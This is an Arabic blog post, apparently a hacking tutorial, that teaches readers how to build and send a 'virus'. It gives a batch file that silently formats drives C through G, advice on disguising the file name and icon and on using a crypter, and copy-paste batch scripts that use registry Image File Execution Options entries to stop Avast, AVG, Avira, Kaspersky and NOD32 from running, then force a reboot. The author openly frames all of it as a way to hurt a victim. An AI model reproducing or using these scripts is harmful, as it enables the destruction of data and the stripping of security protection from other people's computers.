تخطى إلى المحتوى

كيف يتم صناعة وخلق الفيرس 2024

  • بواسطة

كيف يتم طµظ†ط§ط¹ط© ظˆط®ظ„ظ‚ الفيرس
هل هذا امر صعب ؟
كلا على الاطلاق
فالفيرس عبارة عن كود تنفيذى يتم كتابتة يدويا فى بيئة الويندوز احيانا من خلال اداة "النوتباد NotePad" ولا توجد معجزات فى الامر او من خلال بعض البرامج المتخصصة فى هذا
ولست بحاجة الى القسم بايمان تعيد الكافر الى حظيرة الايمان بأن لدى اكثر من 600 برنامج وفيرس … ولكننى لا اجد الترف المناسب للتجربة … فالروح واحدة كما يقولون وجهاز عجوز على مثل تلك المغامرات غير مأمونة العواقب …
فيما مضى حين ارغب فى ايذاء احد …
اقوم بفتح النوت باد واقوم بكتابة مثل هذا الامر المكون من سطر او خمسة اسطر على وجه التحديد ..
#echo off
format C: q /s /y
format D: q /s /y
format E: q /s /y
format F: q /s /y
format G: q /s /y
ما معنى هذا الهراء ؟؟
فورمات هو امر مخصص لحذف داتا القرص الصلب ..
سى او دى او اف او جية هو اسم البارتيشن فى القرص
حرف كيو معناه "كويكلى يعنى سريع " Quickly
حرف اس يعنى سايلنت يعنى صامت Silent
حرف واى يعنى "نعم " yes
لم لم يفهم فالكود يتم كتابتة فى ملف نوت باد
كل سطر معناه = فورمات =القرص فلان + فورماتسريع + فورمات صامت بلا شاشة سوداء تظهر للمستخدم + نعم موافق على لافورمات حتى لا تظهر للمستخدم رسالة تطالبه بتأكيد الفورمات…"
, ويتم حفظة بامتداد بات او اى اكس اية كالاتى
Format.bat
او
طبعا مش هنكتب اسم الملف فورمات ونبعته للضحية كن ذكيال واختر اى اسم يروق لك
format.exe
ونحن فى اغلب الاحيان نحتار امتداد بات … وهو الخاص بالاوامر التنفيذية
ما الامر الاخر المهم فى ط§ظ„ظپظٹط±ط³ وصناعتة وارسالة ؟؟
طبعا تحتاج الى برنامج تشفير ال**** وتغيير ايقونتة الواضحة لبعض المستخدمين حتى لو اوهمتهم بأن هذى صورة … فانت بحاجة الى تغيير الامتداد وتغيير الايقونة
هناك العديد من برامج التشفير يمككم البحث عنها
سوف اقوم بأرفاق برنامج تشفير صغير يقوم بتغيير ايقونة ال**** وتشفيرة
Yap crypter.zip فى المرفقات يمكنم تحميلة
………………………………………….. ….
كثيرا ما نسمع عن بعض الفيروسات التى تقوم بقتل برامج الحماية فكيف يتم ذلك ؟
ايضا هى اكواد تنفيذية فى بيئة الدوس يتم كتابتها وتشفيرها ودمجها فى ملف ط§ظ„ظپظٹط±ط³ من خلال برامج البليند Blind المخصصة للدمج — عموما فبرنامج MPS يقوم بالدمج وقد طرحتة لكم من قبل وهو مخصص لسرقة باسوودرات الياهو 10 فاقل
طيب ازاى واين نجد تلك الاكواد
هاكم الاكواد يا اصداقء قوموا بنسخها ولصقها فى ملف نوت باد وتسميتها باى اسم يعجبكم
بشرطك ان يكون الاسم على هذى الصيغة مثلا
Kill norton.bat
kill avira.bat
وهكذا … المهم ان ينتهى بدوت باااااااااااااات
كود قتل الافاست
اقتباس:
#echo off
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsashDisp.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsaswupdsv.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsashserv.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsashMaisv.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsash***sv.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsashQuick.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssched.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsashAvast.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsVisthUpd.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsAVASTSS.scr" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsashSimpl.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsashCmd.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsashSimp2.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsashEnhcd.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
shutdown -f -r -t 0
كود قتل AVG anti-virus
اقتباس:
#echo off
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsavgcfgex.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsavgcmgr.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsavgcsrvx.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsavgdumpx.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsavgemc.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsavgfrw.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsavgiproxy.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsavgnsx.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsavgscanx.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsavgtray.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsavgui.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsavgupd.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsavgwdsvc.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsfixcfg.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
shutdown -f -r -t 0
كود قتل افيرا
اقتباس:
echo off#
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsavgnt.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsavscan.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsavcenter.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsavguard.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsavwsc.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsavconfig.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsupdate.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssetup.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssched.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsguardgui.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsavupgsvc.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsavconfig.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsavadmin.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
shutdown -f -r -t 0
كود قتل الكاسبر سكاى
اقتباس:
#echo off
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsavp.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
shutdown -f -r -t 0
كود قتل النود32
اقتباس:
#echo off
taskkill /im egui.exe /f /t
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsegui.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsekrn.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsSysRescue.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsSysInspector.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
shutdown -f -r -t 0

الوسوم:

اترك تعليقاً

لن يتم نشر عنوان بريدك الإلكتروني. الحقول الإلزامية مشار إليها بـ *

هذا الموقع يستخدم Akismet للحدّ من التعليقات المزعجة والغير مرغوبة. تعرّف على كيفية معالجة بيانات تعليقك.